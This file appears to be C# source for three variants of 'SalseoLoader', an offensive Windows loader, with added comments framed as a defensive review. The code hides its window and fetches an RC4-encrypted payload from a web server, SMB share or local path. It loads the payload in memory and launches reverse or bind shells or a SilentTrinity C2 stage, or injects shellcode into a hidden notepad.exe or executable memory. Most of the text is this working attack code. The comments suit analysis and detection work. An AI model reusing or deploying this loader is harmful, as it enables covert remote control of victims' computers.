// Main: first loader variant on this page (its usage text names the binary SalseoLoader.exe).
// Purpose: take a key, a payload location and a mode from the command line, fetch and decrypt the
// payload, load it as a .NET assembly from a byte array and invoke one method on it by reflection.
//
// Flow, as visible in this block:
//   * ShowWindow(h, 0) is called on the process's main window handle before anything is printed.
//     ShowWindow is declared outside this block; presumably the user32 import, where 0 is SW_HIDE.
//   * With 3 or fewer arguments the usage text is printed and the process exits with code 1.
//   * args[0] is the key (ASCII bytes), args[1] the payload location, args[2] (lower-cased) the mode.
//     reversetcp / reverseudp / reversedns require 5 arguments and reverseicmp requires 4; a mode
//     outside the five listed names exits with code 1. bindtcp has no count check of its own.
//   * The payload source is chosen from the prefix of args[1]: "http" goes to ClienteWeb.LeePayload;
//     a UNC prefix (two backslashes) or anything else goes through File.Exists and then
//     LeeArchivoSMBorLocal.Archivo.
//   * Zipea.Descomprime -> StringHEXToByteArray.Convierte -> RC4.Decrypt(xKey, ...) -> Assembly.Load(byte[]).
//     These helpers are defined outside this block; their behaviour is not verified here.
//   * For the selected mode, GetTypes()[0] is instantiated and the method whose name equals the mode
//     string is invoked with one string[] element: "LHOST LPORT", "LHOST DNSServer" or "LHOST ".
//
// Review notes (defensive reading):
//   * The decrypted bytes go straight into Assembly.Load(byte[]); nothing in this block writes them
//     to disk. The observable steps are the fetch, the in-memory assembly load and the reflection call.
//   * Key and payload location are plain command-line arguments, so process-creation logging that
//     records command lines captures both.
//   * No integrity check on the decrypted bytes is visible between RC4.Decrypt and Assembly.Load.
//   * The banner, author line and status messages are fixed string literals in this block.
//   * NOTE(review): this listing was collapsed onto a few physical lines by the page; the original
//     line breaks (including those inside the verbatim banner string) are not recoverable from here,
//     and the code is left exactly as shown.
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 3) { // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine("[+] Usage:\n"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT"); Console.WriteLine(" [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT"); Console.WriteLine(" [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT"); Console.WriteLine("\n[+] Shells availables:\n\n [-] ReverseTCP\n [-] ReverseUDP\n [-] ReverseDNS\n [-] ReverseICMP\n [-] BindTCP\n"); System.Environment.Exit(1); } //################### Loader parameters and validation of the supplied arguments ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == "reversetcp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == 
"reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } //############################################################# //####################### Loading dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Console.WriteLine("[+] 
Desencriptando el salseo."); Assembly salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //Console.WriteLine("[+] Class de Assembly : " + clases); //######################## Foreach over the methods #################### //##################################################################### Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); Console.ForegroundColor = ConsoleColor.White; //############################################################# //########################### Call to the reverse function ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new 
string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } }
// Main: second loader variant on this page (banner carries "2.0"; usage text names SalseoLoader.exe).
// Purpose: same fetch -> decompress -> hex-decode -> RC4-decrypt pipeline as the other variants, with
// three extra modes: reversessl, silenttrinity and shellcode (injection into another process).
//
// Flow, as visible in this block:
//   * ShowWindow(h, 0) is called on the main window handle first (declared outside this block;
//     presumably the user32 import, where 0 is SW_HIDE).
//   * With 2 or fewer arguments the usage text is printed and the process exits with code 1.
//   * args[0] is the key (ASCII bytes), args[1] the payload location, args[2] (lower-cased) the mode.
//     reversetcp / reversessl / reverseudp / reversedns require 5 arguments, reverseicmp requires 4.
//     The shellcode and silenttrinity checks use thresholds (2 and 3) that the earlier usage check
//     already guarantees, so they cannot trigger at this point.
//   * Payload source by prefix of args[1]: "http" goes to ClienteWeb.LeePayload; a UNC prefix or
//     anything else goes through File.Exists and then LeeArchivoSMBorLocal.Archivo.
//   * Zipea.Descomprime -> StringHEXToByteArray.Convierte -> RC4.Decrypt(xKey, ...). These helpers are
//     defined outside this block; their behaviour is not verified here.
//   * Every mode except shellcode: Assembly.Load(byte[]) on the decrypted bytes, then GetTypes()[0]
//     is instantiated and one method is invoked by name ("lanza" for silenttrinity, otherwise the
//     mode string) with a single string[] argument built from args[3] and, where used, args[4].
//   * shellcode mode: the decrypted bytes are handed to SalsaInjector.CodeInject(pid, sc). With 4
//     arguments the pid is Convert.ToInt32(args[3]); with exactly 3 arguments the block starts
//     C:\WINDOWS\SYSTEM32\NOTEPAD.EXE with ProcessWindowStyle.Hidden and uses that process's id.
//     SalsaInjector is defined outside this block; what CodeInject does is not visible here.
//
// Review notes (defensive reading):
//   * Nothing in this block writes the decrypted bytes to disk; they are consumed by
//     Assembly.Load(byte[]) or passed to CodeInject.
//   * Key, payload location, mode and (optionally) the target pid are plain command-line arguments,
//     so process-creation logging that records command lines captures them.
//   * In the 3-argument shellcode case a hidden notepad.exe is created as a child of this process;
//     that parent/child pair and the hidden window style are visible in process telemetry.
//   * No integrity check on the decrypted bytes is visible before they are loaded or injected.
//   * NOTE(review): this listing was collapsed onto a few physical lines by the page; original line
//     breaks (including those inside the verbatim banner and usage strings) are not recoverable from
//     here, and the code is left exactly as shown.
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| 2.0 "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 2) { string ayuda = @" [+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode PID [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine(ayuda); System.Environment.Exit(1); } //################### Loader parameters and validation of the supplied arguments ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = 
args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == "reversetcp" || funcion == "reversessl") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Environment.Exit(1); } } if (funcion == "shellcode") { if (args.Length < 2) { Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } if (funcion == "silenttrinity") { if (args.Length < 3) { Environment.Exit(1); } } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } 
//############################################################# //####################### Loading dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //######################## Foreach over the methods #################### //##################################################################### //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); //Console.ForegroundColor = ConsoleColor.White; //############################################################# } //########################### Call to the SilentTrinity function ######################## if (funcion == "silenttrinity") { string URLSILENT = args[3].ToString(); string[] argumentos = new string[] { URLSILENT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### Call to the reverse function ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string 
LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; if (args.Length == 4) { int pid = System.Convert.ToInt32(args[3].ToString()); SalsaInjector.CodeInject(pid, sc); } if (args.Length == 3) { Process proc = new Process(); Console.WriteLine("[+] Spawneando 
proceso notepad.exe"); proc.StartInfo.FileName = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE"; proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; proc.Start(); int pid = proc.Id; Console.WriteLine("[+] Proceso con pid " + pid); SalsaInjector.CodeInject(pid, sc); } } }
// Main: third loader variant on this page (usage text names SalseoLoader.exe; no pid form of the
// shellcode mode is listed). Differs from the other command-line variants in how the shellcode
// mode runs: the decrypted bytes are executed inside this process instead of being injected elsewhere.
//
// Flow, as visible in this block:
//   * ShowWindow(h, 0) is called on the main window handle first (declared outside this block;
//     presumably the user32 import, where 0 is SW_HIDE).
//   * With 2 or fewer arguments the usage text is printed and the process exits with code 1.
//   * args[0] is the key (ASCII bytes), args[1] the payload location, args[2] (lower-cased) the mode.
//     reversetcp / reversessl / reverseudp / reversedns require 5 arguments, reverseicmp requires 4.
//     The shellcode and silenttrinity checks use thresholds (2 and 3) that the earlier usage check
//     already guarantees, so they cannot trigger at this point.
//   * Payload source by prefix of args[1]: "http" goes to ClienteWeb.LeePayload; a UNC prefix or
//     anything else goes through File.Exists and then LeeArchivoSMBorLocal.Archivo.
//   * Zipea.Descomprime -> StringHEXToByteArray.Convierte -> RC4.Decrypt(xKey, ...). These helpers are
//     defined outside this block; their behaviour is not verified here.
//   * Every mode except shellcode: Assembly.Load(byte[]) on the decrypted bytes, then GetTypes()[0]
//     is instantiated and one method is invoked by name ("lanza" for silenttrinity, which receives
//     args[3] followed by a space; otherwise the mode string) with a single string[] argument.
//   * shellcode mode: VirtualAlloc(IntPtr.Zero, sc.Length + 1, RESERVE | COMMIT, EXECUTE_READWRITE),
//     Marshal.Copy of the bytes into that region, Marshal.GetDelegateForFunctionPointer to an
//     ExecuteDelegate, a call through the delegate, and VirtualFree(..., MEM_RELEASE) in `finally`.
//     VirtualAlloc, VirtualFree, ExecuteDelegate and the enum types are declared outside this block.
//
// Review notes (defensive reading):
//   * The shellcode path creates a region that is readable, writable and executable at the same
//     time, copies bytes into it and calls into it. That allocation is requested directly from
//     managed code through the VirtualAlloc import rather than by the runtime.
//   * The only check on the VirtualAlloc result is Debug.Assert, which is compiled out unless DEBUG
//     is defined; its message mentions "memoria remota" although the call shown is VirtualAlloc
//     with no process handle.
//   * Nothing in this block writes the decrypted bytes to disk.
//   * Key, payload location and mode are plain command-line arguments, so process-creation logging
//     that records command lines captures them.
//   * NOTE(review): this listing was collapsed onto a few physical lines by the page; original line
//     breaks (including those inside the verbatim banner and usage strings) are not recoverable from
//     here, and the code is left exactly as shown.
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 2) { string ayuda = @" [+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine(ayuda); System.Environment.Exit(1); } //################### Loader parameters and validation of the supplied arguments ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == 
"reversetcp" || funcion == "reversessl") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Environment.Exit(1); } } if (funcion == "shellcode") { if (args.Length < 2) { Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } if (funcion == "silenttrinity") { if (args.Length < 3) { Environment.Exit(1); } } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } //############################################################# //####################### Loading dll 
######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //######################## Foreach over the methods #################### //##################################################################### //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); //Console.ForegroundColor = ConsoleColor.White; //############################################################# } //########################### Call to the SilentTrinity function ######################## if (funcion == "silenttrinity") { string URLSILENT = args[3].ToString(); string[] argumentos = new string[] { URLSILENT + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### Call to the reverse function ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { 
LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE); System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota."); Console.WriteLine("[+] Intentando cargar 
Shellcode"); try { Marshal.Copy(sc, 0, baseAddr, sc.Length); ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate)); del(); } catch (Exception e) { Console.WriteLine(e.Message); } finally { VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE); } } }
// Main: standalone variant (its usage text names the binary SalseoStandalone.exe). It takes no
// command-line input; the key, payload location, mode and connection values are read line by line
// from .\mandanga.txt in the current directory.
//
// Flow, as visible in this block:
//   * ShowWindow(h, 0) is called on the main window handle first (declared outside this block;
//     presumably the user32 import, where 0 is SW_HIDE).
//   * If .\mandanga.txt does not exist, the usage text and an error line are printed and the
//     process exits with code 1. A file with fewer than 3 lines also prints usage and exits.
//   * Line 1 is the key, line 2 the payload location, line 3 (lower-cased) the mode. Further lines
//     depend on the mode: "silenttrinity" reads one URL line; "icmp" reads one host line;
//     "serverdns" reads host + DNS server; every other mode except "shellcode" reads host + port.
//     The dispatch further down tests "reverseicmp" and "reversedns", not "icmp" / "serverdns", so
//     with those dispatch names the generic host + port branch is the one that runs and DNSServer
//     keeps its initial empty string.
//   * The values read are echoed to the console. A NullReferenceException raised inside the try
//     block is printed and execution continues with whatever was read up to that point.
//   * Payload source by prefix of Salseo_URL: "http" goes to ClienteWeb.LeePayload; a UNC prefix or
//     anything else goes through File.Exists and then LeeArchivoSMBorLocal.Archivo.
//   * Zipea.Descomprime -> StringHEXToByteArray.Convierte -> RC4.Decrypt(xKey, ...). These helpers are
//     defined outside this block; their behaviour is not verified here.
//   * Every mode except shellcode: Assembly.Load(byte[]) on the decrypted bytes, then GetTypes()[0]
//     is instantiated and one method is invoked by name ("lanza" for silenttrinity, otherwise the
//     mode string) with a single string[] argument.
//   * shellcode mode: VirtualAlloc(IntPtr.Zero, sc.Length + 1, RESERVE | COMMIT, EXECUTE_READWRITE),
//     Marshal.Copy, Marshal.GetDelegateForFunctionPointer to an ExecuteDelegate, a call through the
//     delegate, and VirtualFree(..., MEM_RELEASE) in `finally`. Those imports and types are declared
//     outside this block.
//
// Review notes (defensive reading):
//   * Configuration comes from a file instead of the command line, so during triage the key and the
//     payload location are found in .\mandanga.txt (clear text, next to the working directory of the
//     binary) and in the console output, not in the recorded process command line.
//   * The shellcode path creates a region that is readable, writable and executable at once and
//     calls into it; the only check on the VirtualAlloc result is Debug.Assert, which is compiled
//     out unless DEBUG is defined.
//   * Nothing in this block writes the decrypted bytes to disk.
//   * NOTE(review): `"[+] Password: "******"shellcode"` is not valid C#; it looks like a masking
//     artifact of the page that replaced part of the original statement. It is left exactly as shown.
//   * NOTE(review): this listing was collapsed onto a few physical lines by the page; original line
//     breaks (including those inside the verbatim banner and usage strings) are not recoverable from
//     here, and the code is left exactly as shown.
